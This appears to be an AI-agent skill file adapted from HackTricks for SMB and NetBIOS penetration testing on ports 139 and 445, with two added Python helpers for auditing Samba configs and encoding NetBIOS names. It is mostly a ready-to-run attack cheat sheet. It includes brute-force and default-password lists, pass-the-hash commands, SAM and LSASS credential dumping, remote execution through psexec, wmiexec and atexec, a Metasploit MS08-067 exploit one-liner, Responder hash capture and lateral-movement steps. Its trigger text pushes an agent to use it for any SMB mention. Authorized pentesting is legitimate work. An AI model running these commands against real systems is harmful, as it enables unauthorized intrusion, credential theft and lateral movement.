Hacktricks-skills smb-pentesting

SMB/NetBIOS pentesting on ports 139/445. Use this skill whenever the user mentions SMB, NetBIOS, file shares, Windows shares, CIFS, port 139, port 445, or needs to enumerate/attack SMB services. This includes share enumeration, credential attacks, command execution via SMB, and post-exploitation. Make sure to use this skill for any Windows network service testing, Active Directory SMB attacks, or when investigating file sharing vulnerabilities.

Install: clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/network-services-pentesting/pentesting-smb/pentesting-smb/SKILL.MD

Source content

SMB Pentesting Skill

A comprehensive skill for Server Message Block (SMB) and NetBIOS security testing on ports 139 and 445.

When to Use This Skill

Use this skill when:

  • Testing SMB services on ports 139 (NetBIOS) or 445 (SMB over IP)
  • Enumerating Windows file shares and network resources
  • Performing credential attacks against SMB services
  • Executing commands via SMB (psexec, smbexec, wmiexec, etc.)
  • Investigating Active Directory SMB vulnerabilities
  • Testing for SMB relay attacks or NTLM theft scenarios
  • Analyzing Samba configurations for misconfigurations

Quick Reference

Port Identification

  • Port 139: NetBIOS Session Service (NBT over IP)
  • Port 445: SMB over IP (direct TCP, no NetBIOS)

Common Tools

  • enum4linux / enum4linux-ng - SMB enumeration
  • smbmap - Share discovery and traversal
  • crackmapexec / netexec - Multi-purpose SMB testing
  • smbclient - Manual share access
  • rpcclient - RPC enumeration
  • Impacket tools - Advanced SMB operations

Enumeration Workflow

Step 1: Initial Reconnaissance

Start with basic network scanning to identify SMB services:

# Scan for SMB ports
nmap -p 139,445 -sV <target>

# NetBIOS name resolution
nbtscan -r <network_range>

# SMB enumeration scripts (shares, users, sessions, etc.)
nmap --script smb-enum-* -p 445 <target>

Step 2: Anonymous Enumeration

Try accessing shares without credentials:

# Full enumeration with enum4linux
enum4linux -a <target>
enum4linux-ng -A <target>

# List shares with null session
smbclient -L //<target> -N
smbmap -H <target>

# CrackMapExec enumeration
crackmapexec smb <target> -u '' -p '' --shares
crackmapexec smb <target> --users
crackmapexec smb <target> --groups

# RPC enumeration
rpcclient -U "" -N <target>

Step 3: Share Discovery

Enumerate all available shares:

# List all shares
smbmap -H <target> -P 445
smbmap -R -H <target>  # Recursive listing

# Try common share names manually
for share in C$ D$ ADMIN$ IPC$ PRINT$ FAX$ SYSVOL NETLOGON; do
    # quote the UNC path so the shell does not eat the backslashes or treat < > as redirections
    smbclient -U '%' -N "//<target>/$share" -c 'ls' 2>&1 | head -5
done

# CrackMapExec share enumeration
crackmapexec smb <target> --shares

Step 4: User and Group Enumeration

# Enumerate users
crackmapexec smb <target> --users
rpcclient -U "" -N <target> -c 'enumdomusers'

# Enumerate groups
crackmapexec smb <target> --groups
rpcclient -U "" -N <target> -c 'enumdomgroups'

# Get logged-on users
crackmapexec smb <target> --loggedon-users

# Impacket user enumeration
lookupsid.py -no-pass <target>

Credential Testing

Null Session and Guest Access

# Test null session
smbclient -L //<target> -N
smbmap -H <target> -u null -p null

# Test guest account
smbmap -H <target> -u guest -p ''
crackmapexec smb <target> -u guest -p '' --shares

Known Credentials

# With username/password
smbmap -H <target> -u <username> -p <password>
crackmapexec smb <target> -u <username> -p <password> --shares

# With NTLM hash (Pass-the-Hash)
crackmapexec smb <target> -u <username> -H <ntlm_hash> --shares
smbclient -L //<target> -U '<username>%<ntlm_hash>' --pw-nt-hash

# With Kerberos ticket
smbclient --kerberos //<target>/C$
crackmapexec smb <target> -k

Common Credentials to Try

Username          Common passwords
(blank)           (blank)
guest             (blank)
Administrator     password, administrator, admin, (blank)
admin             password, admin, administrator
arcserve          arcserve, backup
backup            backup, backupexec, arcada
test/lab/demo     password, test, lab, demo

Brute Force (Use Carefully)

# Nmap brute force
nmap --script smb-brute -p 445 <target>

# Hydra
hydra -t 1 -V -f -l <username> -P <wordlist> <target> smb

# CrackMapExec brute force
crackmapexec smb <target> -u <username> -P <wordlist>
crackmapexec smb <target> -u <userlist> -p <password>

# RID brute force
crackmapexec smb <target> -u <username> -p <password> --rid-brute

Command Execution

CrackMapExec Execution

# Execute PowerShell command
crackmapexec smb <target> -u <username> -p <password> -X '$PSVersionTable'

# Execute CMD command
crackmapexec smb <target> -u <username> -p <password> -x whoami

# Pass-the-Hash execution
crackmapexec smb <target> -u <username> -H <ntlm_hash> -x whoami

# Dump SAM database
crackmapexec smb <target> -d <domain> -u <username> -p <password> --sam

# Dump LSASS hashes
crackmapexec smb <target> -d <domain> -u <username> -p <password> --lsa

# Get active sessions
crackmapexec smb <target> -d <domain> -u <username> -p <password> --sessions

# Enumerate disks
crackmapexec smb <target> -d <domain> -u <username> -p <password> --disks

# Get password policy
crackmapexec smb <target> -d <domain> -u <username> -p <password> --pass-pol

Impacket Tools

# psexec.py - Uploads executable to ADMIN$
./psexec.py <username>:<password>@<target>
./psexec.py -hashes <LM:NT> <username>@<target>

# smbexec.py - Fileless execution
./smbexec.py <username>:<password>@<target>
./smbexec.py -hashes <LM:NT> <username>@<target>

# wmiexec.py - Stealthy, no disk touch
./wmiexec.py <username>:<password>@<target>
./wmiexec.py -hashes <LM:NT> <username>@<target>

# dcomexec.py - DCOM-based execution
./dcomexec.py <username>:<password>@<target>
./dcomexec.py -hashes <LM:NT> <username>@<target>

# atexec.py - Task Scheduler execution
./atexec.py <username>:<password>@<target> "command"

Kerberos Authentication

# Sync clock (required for Kerberos)
sudo ntpdate <dc.fqdn>

# Use Kerberos with tools (reads TGT from ccache)
crackmapexec smb <target> -k
smbclient --kerberos //<target>/C$
rpcclient -k <target>

Share Access and File Operations

Connect to Shares

# Connect with null session
smbclient "//<target>/<share>" -N

# Connect with credentials
smbclient "//<target>/<share>" -U <username>

# Connect with NTLM hash (the hash goes in the password field)
smbclient "//<target>/<share>" -U '<username>%<ntlm_hash>' --pw-nt-hash

# Mount share locally
mount -t cifs //<target>/<share> /mnt/share
mount -t cifs -o "username=<user>,password=<pass>" //<target>/<share> /mnt/share

Download Files

# Download specific file with smbmap
smbmap -R <share> -H <target> -A <filename> -q

# Download all files with smbclient
smbclient "//<target>/<share>"
> mask ""
> recurse
> prompt
> mget *

# Search and download with CrackMapExec
crackmapexec smb <target> -u <username> -p <password> -M spider_plus --share <share>

Upload Files (if writable)

# Upload with smbclient
smbclient "//<target>/<share>"
> put localfile.txt

# Test write access to SYSVOL
smbclient "//<target>/SYSVOL" -U <username> -D "<domain>/scripts"
> put test.txt

Vulnerability Scanning

CVE Scanning

# Scan for known SMB vulnerabilities
nmap -p 139,445 --script='smb-vuln*' <target>

# Specific CVE scans
nmap -p 445 --script=smb-vuln-ms08-067.nse <target>  # MS08-067
nmap -p 445 --script=smb-vuln-ms17-010.nse <target>  # EternalBlue
nmap -p 445 --script=smb-vuln-cve2009-3103.nse <target>

# Metasploit search
searchsploit microsoft smb
msfconsole -q -x 'use exploit/windows/smb/ms08_067_netapi; set RHOSTS <target>; exploit'

Samba Configuration Analysis

Check /etc/samba/smb.conf for dangerous settings:

Setting                     Risk
guest ok = yes              Anonymous access
read only = no              Write access
writable = yes              File modification
create mask = 0777          Full permissions
logon script = script.sh    Script execution

# Check Samba status
smbstatus

# View Samba config
cat /etc/samba/smb.conf
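As an added example (not part of the skill or of HackTricks), a small Python checker that parses an smb.conf and reports the settings from the table above; it folds Samba's alternative spellings (writeable, write ok, public) into one name so a share written that way is not missed. The sample configuration is constructed for the example.

```python
# Constructed sample smb.conf for demonstration; not taken from any real host.
SAMPLE_SMB_CONF = """
[public]
   guest ok = yes
   read only = no
   create mask = 0777
[backup]
   ; "writeable" is a Samba synonym for "writable"
   writeable = yes
[netlogon]
   logon script = logon.bat
"""
SYNONYMS = {"writeable": "writable", "write ok": "writable", "public": "guest ok"}  # Samba spellings folded to one name

def _yes(value):
    return value.strip().lower() in ("yes", "true", "1")

# (option, predicate on its value, risk) for each row of the table above
CHECKS = [
    ("guest ok", _yes, "Anonymous access"),
    ("read only", lambda v: not _yes(v), "Write access"),
    ("writable", _yes, "File modification"),
    ("create mask", lambda v: int(v, 8) & 0o002, "Full permissions"),  # world-writable
    ("logon script", bool, "Script execution"),
]

def parse_smb_conf(text):
    """Parse [section] headers and 'key = value' lines; lines starting ; or # are comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            key = " ".join(key.lower().split())  # option names are case/space-insensitive
            sections[current][SYNONYMS.get(key, key)] = value.strip()
    return sections

def audit_smb_conf(text):
    """Return (share, setting, risk) triples for every risky setting in every section."""
    findings = []
    for share, opts in parse_smb_conf(text).items():
        for option, risky, risk in CHECKS:
            if option in opts and risky(opts[option]):
                findings.append((share, f"{option} = {opts[option]}", risk))
    return findings
```

Feed it the output of `cat /etc/samba/smb.conf` (or `testparm -s`, which prints the effective configuration) to get a list of shares worth looking at first.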

Advanced Techniques

SMB Relay Attack

# Start Responder to capture NTLM hashes
responder -I <interface> -wv

# Use captured credentials. Note: Responder captures Net-NTLMv2 challenge/responses, which cannot be
# passed with -H; -H needs an NT hash such as one dumped with --sam or --lsa
crackmapexec smb <target> -u <username> -H <captured_hash>

SMB Trap

# Use MitMf for SMB trapping
mitmf -i <interface>

# Plant malicious file to trigger authentication
# (via SMB share or web page with SMB URL)

Registry Access

# Query remote registry with Impacket
reg.py <domain>/<username>@<target> -hashes <LM:NT> query -keyName HKLM -s
reg.py <domain>/<username>@<target> -hashes <LM:NT> query -keyName HKCU -s
reg.py <domain>/<username>@<target> -hashes <LM:NT> query -keyName HKU -s

BloodHound Integration

# Use ShareHound to collect SMB share data
sharehound -ai <target> -au <username> -ap <password> -ns <target>

# Import results to BloodHound for attack path analysis

Safety Considerations

  1. Brute force carefully - Account lockout policies may block access
  2. Test write access - Don't assume read-only shares are safe
  3. Check for honeypots - Unusual share names may indicate traps
  4. Respect scope - Only test authorized targets
  5. Document findings - Track which shares are writable, which users exist

Common Pitfalls

  • Port 139 vs 445: Some tools work on one but not the other
  • Kerberos-only environments: NTLM may return STATUS_NOT_SUPPORTED
  • Clock skew: Kerberos requires synchronized time
  • Hidden shares: May not appear in listings but still accessible
  • ACL vs share permissions: Share may be read-only but NTFS ACLs allow writes
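Why port 139 and 445 behave differently (the first pitfall above and the Port Identification section): a port 139 client must open with an NBT Session Request that carries the encoded NetBIOS name of the called host, whereas port 445 carries SMB directly over TCP with no such step. The following is an added example, not code from the skill or from HackTricks; it builds and parses that request, and the host names used are constructed.

```python
import struct

# RFC 1001/1002 NetBIOS name encoding, as used by the port 139 session service.
# The names used below ("*SMBSERVER", "PENTEST") are constructed sample values.

def encode_netbios_name(name, suffix=0x20):
    """First-level encoding: pad to 15 chars, append the suffix byte (0x20 = File
    Server service), then write each byte as two letters 'A'..'P' (one per nibble)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    letters = bytearray()
    for b in raw:
        letters += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return bytes([len(letters)]) + bytes(letters) + b"\x00"  # length, 32 letters, terminator

def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name: returns (name, suffix)."""
    length = encoded[0]
    letters = encoded[1:1 + length]
    raw = bytes(((hi - 0x41) << 4) | (lo - 0x41) for hi, lo in zip(letters[::2], letters[1::2]))
    return raw[:15].decode("ascii").rstrip(), raw[15]

def session_request(called, calling):
    """NBT SESSION REQUEST (type 0x81): what a port 139 client sends before any SMB
    traffic. Port 445 has no such step, which is why some tools work on only one port."""
    body = encode_netbios_name(called, 0x20) + encode_netbios_name(calling, 0x00)
    # 4-byte header: type, flags (bit 0 = bit 16 of the length), 16-bit length
    return struct.pack(">BBH", 0x81, (len(body) >> 16) & 1, len(body) & 0xFFFF) + body

def parse_session_request(pkt):
    """Return (called, calling) names from a SESSION REQUEST, or None if it is not one."""
    if len(pkt) < 4 or pkt[0] != 0x81:
        return None
    length = ((pkt[1] & 1) << 16) | struct.unpack(">H", pkt[2:4])[0]
    body = pkt[4:4 + length]
    return decode_netbios_name(body[:34])[0], decode_netbios_name(body[34:68])[0]
```

The encoded form of *SMBSERVER is the familiar CKFDENECFDEFFCFGEFFCCACACACACACA string seen in packet captures of port 139 traffic, which is a quick way to tell NBT sessions from direct-TCP SMB when reviewing logs or pcaps.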

Next Steps After Enumeration

  1. Identify writable shares - Test upload capability
  2. Check for sensitive files - Registry.xml, web.config, credentials
  3. Look for logon scripts - SYSVOL may contain executable scripts
  4. Test lateral movement - Use discovered credentials on other hosts
  5. Check for known vulnerabilities - Run exploit scanners
  6. Analyze ACLs - Use BloodHound for attack path discovery